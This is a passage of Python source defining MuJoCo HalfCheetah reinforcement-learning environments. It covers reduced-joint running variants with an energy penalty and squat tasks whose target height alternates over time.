forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3dofb(mujoco_env.MujocoEnv, utils.EzPickle):
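    """Three-joint 'back' HalfCheetah variant (half_cheetah_3dof_back.xml);
    joints tracked for the energy penalty: bthigh, bshin, fthigh."""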
def __init__(self,
xml_file='half_cheetah_3dof_back.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
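    """Reduced HalfCheetah (half_cheetah_3dofv3.xml); joints tracked for the
    energy penalty: bshin, bfoot, fthigh."""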
def __init__(self,
xml_file='half_cheetah_3dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
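    """Reduced HalfCheetah (half_cheetah_3dofv4.xml); joints tracked for the
    energy penalty: bthigh, fshin, ffoot."""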
def __init__(self,
xml_file='half_cheetah_3dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dof(mujoco_env.MujocoEnv, utils.EzPickle):
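    """Two-joint HalfCheetah variant (half_cheetah_2dof.xml); joints tracked
    for the energy penalty: bthigh, fthigh (thighs only)."""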
def __init__(self,
xml_file='half_cheetah_2dof.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv2(mujoco_env.MujocoEnv, utils.EzPickle):
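    """Two-joint HalfCheetah variant (half_cheetah_2dofv2.xml); joints tracked
    for the energy penalty: bfoot, ffoot (feet only)."""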
def __init__(self,
xml_file='half_cheetah_2dofv2.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bfoot','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
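    """Two-joint HalfCheetah variant (half_cheetah_2dofv3.xml); joints tracked
    for the energy penalty: bshin, fshin (shins only)."""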
def __init__(self,
xml_file='half_cheetah_2dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bshin','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
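    """Two-joint HalfCheetah variant (half_cheetah_2dofv4.xml); joints tracked
    for the energy penalty: bshin, fthigh."""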
def __init__(self,
xml_file='half_cheetah_2dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bshin','fthigh']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_2dofv5(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofv5.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahSquat2dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_2dofsquat.xml',
distance_weigth=5.0,
health_weight=1,
horizontal_weight=0.1, ##
ctrl_cost_weight=0.,
reset_noise_scale=0.1,
healthy_z_range=(0.2, 1),
terminate_when_unhealthy=False, ##
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
if terminate_when_unhealthy:
healthy_reward=1.0
else:
healthy_reward=0
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._healthy_reward = healthy_reward
self._health_weight=health_weight
self._distance_weigth = distance_weigth
self._horizontal_weight=horizontal_weight
self._terminate_when_unhealthy = terminate_when_unhealthy
self._healthy_z_range = healthy_z_range
self.target_low=0.25#0.45
self.target_high=0.7#0.6
self.joint_list=['bshin','fshin']
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.target_pos = np.asarray([0, 0, 0])
self.target_site=0
self.flipstep=75
self.timestep=0
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
@property
def is_healthy(self):
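        # The agent counts as healthy while the 'head' geom has finite coordinates
        # and its height stays within self._healthy_z_range.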
# state = self.state_vector()
# state = self.get_body_com("torso")
state = self.sim.data.get_geom_xpos('head')
min_z, max_z = self._healthy_z_range
is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)
return is_healthy
@property
def healthy_reward(self):
return float(
self.is_healthy
or self._terminate_when_unhealthy
) * self._healthy_reward
@property
def done(self):
done = (not self.is_healthy
if self._terminate_when_unhealthy
else False)
return done
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
#x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
self.timestep += 1
#x_position_after = self.sim.data.qpos[0]
#x_velocity = ((x_position_after - x_position_before)
# / self.dt)
ctrl_cost = np.sum(np.square(action))#self.control_cost(action)
healthy_reward = self.healthy_reward
vec = self.get_body_com("torso")[2] - self.target_pos[2]
reward_dist = np.linalg.norm(vec)
horizontal_penalty=np.abs(sum([0, 0, 1] - self.sim.data.geom_xmat[1][6:9]))
#forward_reward = x_velocity#self._forward_reward_weight *
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
#reward = forward_reward - ctrl_cost
ori_reward = - self._distance_weigth * reward_dist \
- self._ctrl_cost_weight * ctrl_cost \
- self._horizontal_weight * horizontal_penalty \
+ self._health_weight * healthy_reward
done = self.done
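        # Every `flipstep` steps, toggle the squat target height between
        # target_low and target_high and re-center the target above the torso.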
if self.timestep % self.flipstep == 0 and self.timestep != 0: # 2
if self.target_pos[2] <= self.target_low:
self.target_pos[2] = self.target_high
elif self.target_pos[2] >= self.target_high:
self.target_pos[2] = self.target_low
self.target_pos[0] = self.get_body_com("torso")[0]
self.target_pos[1] = self.get_body_com("torso")[1]
self.sim.data.site_xpos[self.target_site]= self.target_pos
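        # Energy proxy for the squat task: sum of squared joint-angle changes
        # (the |action|-weighted form is kept commented out inside the loop).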
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
# energy = energy + np.abs(action[i]) * delta_theta
energy = energy + np.sum(np.square(delta_theta))
        if not self._terminate_when_unhealthy:
            unhealthy_penalty = -5
            if not self.is_healthy:
                ori_reward += unhealthy_penalty
final_reward =ori_reward- self.energy_weights*energy
observation = self._get_obs()
info = {
'energy' : energy,
'reward_dist': -reward_dist,
'reward_ctrl': -ctrl_cost,
'horizontal_penalty': -horizontal_penalty,
'reward_survive': healthy_reward,
'ori_reward': ori_reward,
}
return observation, final_reward, done, info
def _get_obs(self):
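        # Observation: joint positions (optionally without the root x position),
        # joint velocities, the torso-to-target height difference, and, when the
        # horizontal penalty is active, a row of geom 1's rotation matrix (geom_xmat).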
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
body_orientation=self.sim.data.geom_xmat[1][6:9].flat.copy()
#distance=list(self.get_body_com("torso")[2] - self.target_pos[2] )
distance = [self.get_body_com("torso")[2] - self.target_pos[2]]
if self._exclude_current_positions_from_observation:
position = position[1:]
#observation = np.concatenate((position, velocity)).ravel()
if self._horizontal_weight != 0:
observation = np.concatenate(
(position, velocity,body_orientation, distance)).ravel()
else:
observation = np.concatenate(
(position, velocity, distance)).ravel()
return observation
def reset_model(self):
self.timestep=0
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = np.asarray([self.get_body_com("torso")[0], self.get_body_com("torso")[1], self.target_low])
observation = self._get_obs()
return observation
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 1.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0.5 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0.5
self.viewer.cam.lookat[2] += 0
self.viewer.cam.elevation = 0 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
class HalfCheetahSquat4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_4dofsquat.xml',
distance_weigth=5.0,
health_weight=1,
horizontal_weight=0.1, ##
ctrl_cost_weight=0.,
reset_noise_scale=0.1,
healthy_z_range=(0.2, 1),
terminate_when_unhealthy=False, ##
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
if terminate_when_unhealthy:
healthy_reward=1.0
else:
healthy_reward=0
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._healthy_reward = healthy_reward
self._health_weight=health_weight
self._distance_weigth = distance_weigth
self._horizontal_weight=horizontal_weight
self._terminate_when_unhealthy = terminate_when_unhealthy
self._healthy_z_range = healthy_z_range
self.target_low=0.25
self.target_high=0.7#0.6
self.joint_list=['bthigh','bshin','fthigh','fshin']
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.target_pos = np.asarray([0, 0, 0])
self.target_site=0
self.flipstep=75
self.timestep=0
global path
